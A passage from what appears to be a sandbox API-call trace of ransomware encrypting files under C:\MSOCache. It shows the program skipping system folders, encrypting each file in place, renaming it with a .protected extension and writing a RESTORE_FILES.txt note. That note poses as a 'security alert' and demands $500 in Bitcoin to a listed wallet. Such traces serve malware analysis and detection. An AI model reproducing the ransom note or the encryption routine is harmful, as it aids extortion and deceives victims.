Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0056.131] StrStrW (lpFirst="Proofing.xml", lpSrch=".zip") returned 0x0 [0056.131] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x32b, lpOverlapped=0x0) returned 1 [0056.260] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffcd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.260] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x32b, lpOverlapped=0x0) returned 1 [0056.261] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.261] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.261] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.261] CloseHandle (hObject=0xb4) returned 1 [0056.262] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.protected") returned 89 [0056.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.protected")) returned 1 [0056.262] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0056.262] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.262] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0056.262] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0056.262] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.262] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.263] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.263] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.263] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0056.263] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.263] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0056.263] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.263] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0056.263] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x16fc, lpOverlapped=0x0) returned 1 [0056.345] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe904, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.345] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x16fc, lpOverlapped=0x0) returned 1 [0056.345] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.345] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.345] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.345] CloseHandle (hObject=0xb4) returned 1 [0056.527] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0056.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0056.527] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0056.527] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0056.527] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0056.527] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0056.528] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0056.528] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0056.528] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0056.528] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0056.529] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0056.529] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0056.529] CloseHandle (hObject=0xa4) returned 1 [0056.529] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0056.529] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned 66 [0056.529] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0056.529] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0056.529] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*") returned 68 [0056.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0056.603] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0056.603] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0056.603] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0056.603] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0056.603] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0056.603] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.") returned 68 [0056.603] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.603] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0056.603] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0056.603] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.603] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.603] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.603] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.603] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0056.603] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0056.603] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0056.603] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0056.603] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0056.603] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\..") returned 69 [0056.603] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.603] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.603] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0056.603] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0056.603] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.603] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.603] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.604] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Windows") returned -1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Program Files") returned -1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Program Files (x86)") returned -1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="$Recycle.bin") returned 1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="System Volume Information") returned -1 [0056.604] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0056.604] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".protected") returned 0x0 [0056.604] lstrcmpW (lpString1="Office32MUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0056.604] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.604] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.604] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.604] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0056.604] StrStrW (lpFirst="Office32MUI.msi", lpSrch=".txt") returned 0x0 [0056.604] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0056.604] StrStrW (lpFirst="Office32MUI.msi", lpSrch=".rar") returned 0x0 [0056.604] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0056.604] StrStrW (lpFirst="Office32MUI.msi", lpSrch=".zip") returned 0x0 [0056.604] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.612] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.612] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.612] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.612] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.620] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.620] CloseHandle (hObject=0xb4) returned 1 [0056.645] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.protected") returned 92 [0056.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.protected")) returned 1 [0056.645] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Windows") returned -1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Program Files") returned -1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Program Files (x86)") returned -1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="$Recycle.bin") returned 1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="System Volume Information") returned -1 [0056.646] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0056.646] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".protected") returned 0x0 [0056.646] lstrcmpW (lpString1="Office32MUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0056.646] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.646] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.646] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.646] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0056.646] StrStrW (lpFirst="Office32MUI.xml", lpSrch=".txt") returned 0x0 [0056.646] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0056.646] StrStrW (lpFirst="Office32MUI.xml", lpSrch=".rar") returned 0x0 [0056.646] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0056.646] StrStrW (lpFirst="Office32MUI.xml", lpSrch=".zip") returned 0x0 [0056.646] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x567, lpOverlapped=0x0) returned 1 [0056.656] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa99, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.656] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x567, lpOverlapped=0x0) returned 1 [0056.656] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.656] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.656] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.656] CloseHandle (hObject=0xb4) returned 1 [0056.657] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.protected") returned 92 [0056.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.protected")) returned 1 [0056.658] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="Windows") returned -1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="Program Files") returned -1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="Program Files (x86)") returned -1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="$Recycle.bin") returned 1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="System Volume Information") returned -1 [0056.658] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0056.658] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".protected") returned 0x0 [0056.658] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0056.658] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.658] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.658] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.658] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0056.658] StrStrW (lpFirst="OWOW32LR.cab", lpSrch=".txt") returned 0x0 [0056.658] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0056.658] StrStrW (lpFirst="OWOW32LR.cab", lpSrch=".rar") returned 0x0 [0056.658] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 